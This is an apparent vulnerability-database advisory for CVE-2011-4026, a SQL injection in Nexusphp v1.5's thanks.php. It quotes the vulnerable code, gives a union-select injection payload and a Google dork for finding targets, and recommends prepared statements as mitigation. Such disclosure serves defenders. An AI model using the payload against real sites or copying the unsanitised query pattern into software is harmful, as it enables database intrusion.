Nexusphp.v1.5 SQL injection Vulnerability

vendor:

Nexusphp

by:

flyh4t

7.5

CVSS

HIGH

SQL injection

CWE

Product Name: Nexusphp

Affected Version From: nexusphp.v1.5

Affected Version To: nexusphp.v1.5

Patch Exists: NO

Related CWE: CVE-2011-4026

CPE: a:nexusphp:nexusphp:1.5

Metasploit:

Other Scripts:

Platforms Tested: Linux (tested on Linux with Apache)

2011

Nexusphp.v1.5 SQL injection Vulnerability

There is a SQL injection vulnerability in the thanks.php file of Nexusphp v1.5. The vulnerability is caused by not checking the $_POST['id'] parameter, allowing an attacker to perform an SQL injection attack. An attacker can exploit this vulnerability by using the payload _POST[id] : -1 union select version()>4/*

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before using it in SQL queries. This can be done by using prepared statements or parameterized queries.

Source

Exploit-DB raw data:

# Exploit Title: Nexusphp.v1.5 SQL injection Vulnerability
# Google Dork: intitle:nexusphp
# Date: 2011-10-08
# Author: flyh4t
# Software Link: http://sourceforge.net/projects/nexusphp/
# Version: nexusphp.v1.5
# Tested on: linux+apache
# CVE : CVE-2011-4026


Nexusphp is BitTorrent private tracker scripts written in PHP 
The codes is here http://sourceforge.net/projects/nexusphp/
There is a sql injectiong Vulnerability in thanks.php.
 
-----------------------vul code-------------------
//thanks.php
if ($_GET['id'])
 stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!");
$userid = $CURUSER["id"];
$torrentid = $_POST["id"];
$tsql = sql_query("SELECT owner FROM torrents where id=$torrentid");
$arr = mysql_fetch_array($tsql);
-----------------------vul code end-------------------
 
 $_POST["id"] is not checked, lead a sql injection Vulnerability

-----------------------exploit-------------------

_POST[id] : -1 union select version()>4/*

-----------------------exploit end -------------------